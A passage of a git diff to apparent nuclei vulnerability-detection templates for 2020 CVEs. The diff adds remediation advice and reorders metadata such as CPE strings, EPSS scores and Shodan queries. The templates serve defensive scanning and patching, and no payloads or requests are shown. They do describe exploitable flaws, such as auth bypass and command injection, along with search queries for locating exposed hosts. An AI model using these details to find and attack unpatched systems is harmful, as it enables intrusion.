exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests. + remediation: | + Apply the relevant security patches provided by SAP to mitigate this vulnerability. reference: - https://github.com/InitRoot/CVE-2020-6308-PoC - https://launchpad.support.sap.com/#/notes/2943844 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-6308 cwe-id: CWE-918 epss-score: 0.00306 - cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* epss-percentile: 0.66005 + cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 vendor: sap diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 66cc36f259..2cb87321dc 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. + remediation: | + Apply the latest security patch or upgrade to a patched version of OpenSIS. reference: - https://cinzinga.com/CVE-2020-6637/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-6637 cwe-id: CWE-89 epss-score: 0.02003 - cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* epss-percentile: 0.87406 + cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 - shodan-query: http.title:"openSIS" vendor: os4ed product: opensis + shodan-query: http.title:"openSIS" tags: cve,cve2020,sqli,opensis http: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index db6a508523..b8a7c88fb3 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -6,27 +6,27 @@ info: severity: medium description: | WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.8.30. reference: - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33 - https://wordpress.org/plugins/ultimate-faqs/ - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php - https://nvd.nist.gov/vuln/detail/CVE-2020-7107 - https://wordpress.org/plugins/ultimate-faqs/#developers - remediation: Fixed in version 1.8.30. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00517 - cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* epss-percentile: 0.73771 + cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: etoilewebdesign product: ultimate_faq + framework: wordpress tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp http: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 4bc9b9959b..defb7bdfc3 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -5,20 +5,20 @@ info: author: gy741 severity: critical description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. + remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). reference: - https://www.tenable.com/security/research/tra-2020-02 - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - https://nvd.nist.gov/vuln/detail/CVE-2020-7136 - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us - remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 epss-score: 0.16449 - cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* epss-percentile: 0.95315 + cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hpe diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index d687a8b27d..7c0184145b 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: critical description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution. + remediation: This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html @@ -12,14 +13,13 @@ info: - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html - https://nvd.nist.gov/vuln/detail/CVE-2020-7209 - remediation: This is resolved in release 6.0-2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 epss-score: 0.97202 - cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* epss-percentile: 0.99729 + cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index f850693cbd..bce0682f83 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://nvd.nist.gov/vuln/detail/CVE-2020-7318 + remediation: | + Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 classification: @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00051 - cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* epss-percentile: 0.17698 + cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mcafee diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index e527f1a365..969276a9e4 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled. + remediation: | + Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability. reference: - https://www.adminxe.com/2183.html - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-7796 cwe-id: CWE-918 epss-score: 0.72496 - cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* epss-percentile: 0.97646 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index ee86c9457d..f504fdbaaf 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed. + remediation: | + Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected. reference: - https://puppet.com/security/cve/CVE-2020-7943 - https://tickets.puppetlabs.com/browse/PDB-4876 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-7943 cwe-id: CWE-276 epss-score: 0.08018 - cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* epss-percentile: 0.93448 + cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: puppet diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index b7f1784b08..160a76e692 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). + remediation: | + Upgrade Liferay Portal to version 7.2.1 CE GA2 or later to mitigate the vulnerability. reference: - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-7961 cwe-id: CWE-502 epss-score: 0.97467 - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* epss-percentile: 0.99937 + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 vendor: liferay diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 3f709a6116..3d4eae03d0 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' + remediation: | + Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24). reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-7980 cwe-id: CWE-78 epss-score: 0.96908 - cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* epss-percentile: 0.99589 + cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"Intellian Aptus Web" vendor: intelliantech product: aptus_web + shodan-query: http.title:"Intellian Aptus Web" tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce http: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index ece29df375..3749038f95 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -6,19 +6,19 @@ info: severity: medium description: | Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim. + remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. reference: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8115 - remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 - cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* epss-percentile: 0.86916 + cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: revive-adserver diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index f3930e5047..33e6362f3d 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -5,6 +5,8 @@ info: author: tim_koopmans severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. + remediation: | + Upgrade Ruby on Rails to version 5.0.1 or above. reference: - https://hackerone.com/reports/304805 - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-8163 cwe-id: CWE-94 epss-score: 0.96847 - cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* epss-percentile: 0.99557 + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 6c815e1981..796bf3c510 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8191 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 - cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.58213 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 32d7004b9a..4ef601175c 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints. + remediation: | + Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability. reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-8193 cwe-id: CWE-287,CWE-284 epss-score: 0.97454 - cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99926 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 6446a49d2f..41519acb3f 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-8194 cwe-id: CWE-94 epss-score: 0.97341 - cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99825 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 0c5076f287..1693837ae1 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 + remediation: | + Apply the latest security patches or updates provided by Citrix to fix the vulnerability. reference: - https://support.citrix.com/article/CTX277457 classification: @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-8209 cwe-id: CWE-22 epss-score: 0.97223 - cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* epss-percentile: 0.99746 + cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 961c836fcd..f3c0072771 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations. + remediation: | + Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability. reference: - https://k4m1ll0.com/cve-2020-8497.html - https://nvd.nist.gov/vuln/detail/CVE-2020-8497 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-8497 cwe-id: CWE-306 epss-score: 0.002 - cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* epss-percentile: 0.57104 + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: artica diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 0a354688bf..c113595045 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -5,6 +5,8 @@ info: author: pdteam,dwisiswant0 severity: medium description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter. + remediation: | + Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-8512 cwe-id: CWE-79 epss-score: 0.0046 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* epss-percentile: 0.72232 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"icewarp" vendor: icewarp product: icewarp_server + shodan-query: title:"icewarp" tags: edb,packetstorm,cve,cve2020,xss,icewarp http: diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index f15e61e80d..56842f7dd0 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -5,20 +5,20 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. + remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. reference: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8515 - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html - remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97144 - cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* epss-percentile: 0.99693 + cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 vendor: draytek diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index 953dada9d5..e94584809d 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter. + remediation: | + Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability. reference: - https://cxsecurity.com/issue/WLB-2020010234 - https://www.exploit-db.com/exploits/47985 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-8641 cwe-id: CWE-22 epss-score: 0.00796 - cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* epss-percentile: 0.7943 + cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lotus_core_cms_project diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 9aea9ac5f6..c53f839a85 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -5,6 +5,8 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + remediation: | + Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-8644 cwe-id: CWE-94 epss-score: 0.95415 - cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* epss-percentile: 0.99099 + cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: playsms diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 6feed9f0b2..e166b0db52 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -5,6 +5,8 @@ info: author: praetorian-thendrickson severity: high description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + remediation: | + Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. reference: - https://github.com/h4knet/eonrce - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-8654 cwe-id: CWE-78 epss-score: 0.06605 - cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* epss-percentile: 0.92868 + cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eyesofnetwork diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index 10fd871600..b4159f8a34 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. + remediation: | + Update WordPress Time Capsule plugin to version 1.21.16 or later. reference: - https://github.com/SECFORCE/WPTimeCapsulePOC - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-8771 cwe-id: CWE-287 epss-score: 0.06142 - cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92596 + cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: wptimecapsule product: wp_time_capsule + framework: wordpress tags: cve,cve2020,wordpress,wp-plugin http: diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index a660c62ec4..9f70f098a3 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. reference: - https://wpscan.com/vulnerability/10011 - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - https://wpvulndb.com/vulnerabilities/10011 - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 - remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8772 cwe-id: CWE-862 epss-score: 0.96852 - cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9956 + cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: revmakx product: infinitewp_client + framework: wordpress tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass http: diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 25cdeffd9b..d7b8500443 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled. + remediation: | + Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability. reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - https://github.com/Cacti/cacti/releases @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-8813 cwe-id: CWE-78 epss-score: 0.96358 - cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* epss-percentile: 0.99352 + cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cacti diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 0c45fb4b53..f6b2e7de79 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability. + remediation: | + Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability. reference: - https://support.citrix.com/article/CTX269106 - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-8982 cwe-id: CWE-22 epss-score: 0.80263 - cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* epss-percentile: 0.97886 + cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index 